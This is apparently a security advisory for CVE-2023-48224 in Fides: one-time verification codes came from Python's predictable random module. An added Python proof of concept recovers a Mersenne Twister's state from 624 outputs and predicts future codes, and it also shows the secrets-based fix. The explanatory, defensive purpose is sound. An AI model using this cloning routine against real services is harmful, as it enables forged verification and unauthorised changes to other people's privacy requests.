PT-2023-30741 · Fides · Fides

Robertkeyser · Published 2023-11-15 · Updated 2023-11-22 · CVE-2023-48224
CVSS v3.1: 8.2 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
Name of the Vulnerable Software and Affected Versions: Fides versions prior to 2.24.0
Description: The Fides Privacy Center lets data subjects submit privacy and consent requests to the data controllers who run the Fides web application. When the "subject identity verification required" setting is True, the data subject is sent a one-time code to their email address or phone number before the request is honoured. In affected versions those codes were generated with Python's random module, a non-cryptographic pseudo-random number generator (Mersenne Twister) whose internal state can be recovered from its output. An attacker who has observed enough generator output can therefore predict every one-time code issued for the remaining lifetime of the backend Python process, and use the predicted codes to submit "verified" data erasure requests or modify another user's privacy preferences.
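The following is an added example and is not Fides project code or part of the original advisory. It models the weak pattern the advisory describes (codes drawn from Python's random module, i.e. MT19937) beside the hardened pattern (the secrets module), and demonstrates the core problem: an attacker who captures 624 consecutive raw 32-bit outputs of the same generator instance can rebuild its full state and then predict every later code exactly. The six-digit code format, the single shared generator instance, and the attacker's access to raw 32-bit outputs are assumptions made for the demonstration; recovering the state from truncated six-digit codes alone requires more observations and a linear solver and is not shown here.

```python
"""Added example (not Fides code): why Python's `random` is unfit for one-time codes.

Assumptions (not from the advisory): six-digit numeric codes, one shared
MT19937 instance on the backend, and 624 consecutive raw 32-bit outputs of
that instance available to the attacker.
"""
import hmac
import random
import secrets

CODE_LENGTH = 6          # assumption: six-digit numeric codes
MT_STATE_WORDS = 624     # MT19937 state size in 32-bit words
MASK32 = 0xFFFFFFFF


def weak_code(rng: random.Random) -> str:
    """Vulnerable pattern modelled on the advisory: code from a Mersenne Twister.
    randrange(10**6) consumes exactly one 32-bit MT output per attempt."""
    return str(rng.randrange(10 ** CODE_LENGTH)).zfill(CODE_LENGTH)


def secure_code() -> str:
    """Hardened pattern: OS CSPRNG via `secrets`; no recoverable generator state."""
    return str(secrets.randbelow(10 ** CODE_LENGTH)).zfill(CODE_LENGTH)


def verify_code(expected: str, submitted: str) -> bool:
    """Constant-time comparison so the check itself does not leak the code."""
    return hmac.compare_digest(expected.encode(), submitted.encode())


def _undo_right_xor(y: int, shift: int) -> int:
    """Invert y ^= y >> shift: the top `shift` bits are untouched, recover downward."""
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ (x >> shift)
    return x


def _undo_left_xor_mask(y: int, shift: int, mask: int) -> int:
    """Invert y ^= (y << shift) & mask: the low `shift` bits are untouched, recover upward."""
    x = y
    for _ in range(32 // shift + 1):
        x = (y ^ ((x << shift) & mask)) & MASK32
    return x


def untemper(y: int) -> int:
    """Reverse MT19937's output tempering (in reverse order) to get the raw state word."""
    y = _undo_right_xor(y, 18)
    y = _undo_left_xor_mask(y, 15, 0xEFC60000)
    y = _undo_left_xor_mask(y, 7, 0x9D2C5680)
    y = _undo_right_xor(y, 11)
    return y


def clone_mt19937(observed: list[int]) -> random.Random:
    """Rebuild a generator from 624 consecutive getrandbits(32) outputs of the victim."""
    if len(observed) != MT_STATE_WORDS:
        raise ValueError(f"need exactly {MT_STATE_WORDS} consecutive 32-bit outputs")
    words = tuple(untemper(o) for o in observed)
    clone = random.Random()
    # CPython state tuple: (version 3, 624 state words + index, gauss_next).
    # index == 624 makes the clone twist before its next output, as the victim will.
    clone.setstate((3, words + (MT_STATE_WORDS,), None))
    return clone


def predict_codes(clone: random.Random, count: int) -> list[str]:
    """Codes the victim will issue next, derived exactly as weak_code() derives them."""
    return [weak_code(clone) for _ in range(count)]


def demo(seed: int = 2023) -> tuple[list[str], list[str]]:
    """Victim backend vs. attacker: returns (predicted codes, codes actually issued)."""
    victim = random.Random(seed)                                       # backend's MT19937
    leaked = [victim.getrandbits(32) for _ in range(MT_STATE_WORDS)]   # attacker observes
    attacker = clone_mt19937(leaked)
    predicted = predict_codes(attacker, 5)
    issued = [weak_code(victim) for _ in range(5)]                     # sent to users later
    return predicted, issued


if __name__ == "__main__":
    predicted, issued = demo()
    print("predicted:", predicted)
    print("issued:   ", issued)
    print("all predicted:", predicted == issued)
    print("secure code (not predictable this way):", secure_code())
```

The attacker side needs no secret and no bug in the code-check logic: MT19937 is fully determined by 624 of its outputs, so the only fix is a generator with no recoverable state (secrets, os.urandom), which is what moving off the random module achieves.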
Recommendations: For Fides versions prior to 2.24.0, upgrade to version 2.24.0 or later. As a temporary workaround, setting "subject identity verification required" to False stops one-time codes from being issued at all, but note that this disables identity verification for privacy and consent requests entirely rather than hardening it: requests would then be accepted without any proof that the submitter controls the email address or phone number. Treat the workaround as a stopgap and prioritise the upgrade.


Related Identifiers

CVE-2023-48224
GHSA-82VR-5769-6358

Affected Products

Fides